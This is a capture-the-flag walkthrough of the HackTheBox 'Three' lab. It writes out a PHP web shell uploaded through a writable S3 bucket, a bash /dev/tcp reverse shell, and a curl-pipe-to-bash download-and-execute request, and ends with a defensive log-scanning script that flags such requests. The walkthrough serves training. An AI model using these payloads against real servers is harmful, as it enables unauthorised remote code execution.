Three HTB walkthrough
Hey everyone!
I will cover the solution steps of the “Three” machine, which is part of the ‘Starting Point’ labs and has a difficulty rating of ‘Very Easy’.
Now, navigate to the Three machine challenge, download the VPN (.ovpn) configuration file, and open a terminal window to run the command below:
sudo openvpn [filename].ovpn
Note: [filename] should be replaced with the name of your downloaded .ovpn file for the Starting Point lab.
So, now let’s spawn the machine. This is what the interface looks like after the machine has spawned.
Task 1
How many TCP ports are open?
Ans: 2
Task 2
What is the domain of the email address provided in the “Contact” section of the website?
Ans: thetoppers.htb
Task 3
In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
Ans: etc/hosts
Task 4
Which sub-domain is discovered during further enumeration?
Ans: s3.thetoppers.htb
Task 5
Which service is running on the discovered sub-domain?
Ans: Amazon S3
Task 6
Which command line utility can be used to interact with the service running on the discovered sub-domain?
Ans: awscli
Task 7
Which command is used to set up the AWS CLI installation?
Ans: aws configure
Task 8
What is the command used by the above utility to list all of the S3 buckets?
Ans: aws s3 ls
Task 9
This server is configured to run files written in what web scripting language?
Ans: php
Submit root flag:
First, I had to install awscli with the command apt install awscli.
Next, we have to configure the AWS CLI with aws configure.
- we can set every value it asks for to temp
Next, we have to find out about the S3 buckets hosted by the server, using the command from Task 8 and pointing the CLI at the discovered endpoint:
- aws --endpoint=http://s3.thetoppers.htb s3 ls
We can list the files in the bucket with the command
- aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
helpful link: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/AWS%20Amazon%20Bucket%20S3
To get files onto the server, we can copy them to the remote bucket. First, we need to create and upload a PHP shell to the S3 bucket.
I created the file using nano shell.php
Inside the file, I put <?php system($_GET["cmd"]); ?>
- <?php specifies the language being used
- $_GET reads the parameters from the request's query string
- ["cmd"] selects the value of the cmd parameter, which system() then runs as an OS command
- ?> closes the PHP block
Next, we need to upload shell.php to the website. We can do so with the following command
- aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
- cp copies (uploads) shell.php into the bucket, which serves as the website's document root
We can test if it works by going to http://thetoppers.htb/shell.php
We can try to run commands in the URL itself by going to http://thetoppers.htb/shell.php?cmd=whoami
The response from the website verifies that we have code execution.
The next step is to obtain a reverse shell.
STEPS TO OBTAIN A REVERSE SHELL
1. Identify the IP address that you are on.
- from ifconfig
- we are looking for the tun0 address, which is the VPN interface that HTB connects through.
- The IP address is 10.10.14.119
2. Create a new file called shell.sh
- the file must contain a reverse shell payload, for example:
- bash -i >& /dev/tcp/<your ip address>/1337 0>&1
- or you can go to https://www.revshells.com/ and create your own.
3. Start a web server to serve shell.sh
- python3 -m http.server 8080
4. Start a listener on the port used in the payload
- nc -lvnp 1337
5. Request http://thetoppers.htb/shell.php?cmd=curl%2010.10.14.119:8080/shell.sh|bash in the browser.
- %20 is the URL-encoded version of a space ( )
- 10.10.14.119 is your own IP address (the tun0 address from step 1)
- :8080 is the port the web server from step 3 is listening on.
- shell.sh is the payload that we created just now.
- | is the shell pipe operator, which feeds the output of curl into bash.
- bash: takes the downloaded shell.sh and runs it in a new bash instance.
6. The listener from step 4 should now have caught the connection.
In this case, we have shell access and can try to find the root flag from here.
We can look through the directories to find our flag.txt, and voila!
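From the defender's side, both the shell.php?cmd=whoami test and the curl ... | bash chain above leave obvious traces in the web server's access log. The script below is an added example written for this walkthrough (not from HTB or any tool used above); it assumes Apache/nginx combined log format and a short list of typical web-shell parameter names, and runs over constructed sample lines that mirror the requests made in the steps above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx combined format: ip - - [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Parameter names typically used by one-line PHP shells to carry a command (assumed list).
CMD_PARAMS = {"cmd", "c", "exec", "command"}
# Shell constructs that indicate a download-and-execute chain rather than a single command.
CHAIN_RE = re.compile(r"\||;|&&|\b(curl|wget|nc|bash|sh)\b")

def score_request(target):
    """Return the reasons a request target looks like web-shell use (empty list if none)."""
    parts = urlsplit(target)
    reasons = []
    if not parts.path.lower().endswith(".php"):
        return reasons
    # parse_qs percent-decodes values, so %20 in the URL becomes a space here.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() in CMD_PARAMS:
            reasons.append(f"command parameter '{name}'")
            for value in values:
                if CHAIN_RE.search(value):
                    reasons.append(f"download-and-execute chain: {value!r}")
    return reasons

def scan_log(lines):
    """Return (ip, status, target, reasons) for each suspicious line; unparseable lines are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            reasons = score_request(m.group("target"))
            if reasons:
                hits.append((m.group("ip"), int(m.group("status")), m.group("target"), reasons))
    return hits

# Constructed sample lines (not captured from the lab); lines 2 and 3 mirror the walkthrough's requests.
SAMPLE_LOG = [
    '10.10.14.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '10.10.14.119 - - [01/Jan/2024:10:01:00 +0000] "GET /shell.php?cmd=whoami HTTP/1.1" 200 12 "-" "curl/7.88"',
    '10.10.14.119 - - [01/Jan/2024:10:02:00 +0000] "GET /shell.php?cmd=curl%2010.10.14.119:8080/shell.sh|bash HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.10.14.7 - - [01/Jan/2024:10:03:00 +0000] "GET /images/band.jpg?cmd=ignored HTTP/1.1" 200 5000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, status, target, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {target} -> {'; '.join(reasons)}")
```

The first trace, the upload of shell.php itself, is not in the web log at all but in the S3 service's own access log, so a bucket that doubles as a document root needs both logs watched and, above all, its write permissions restricted.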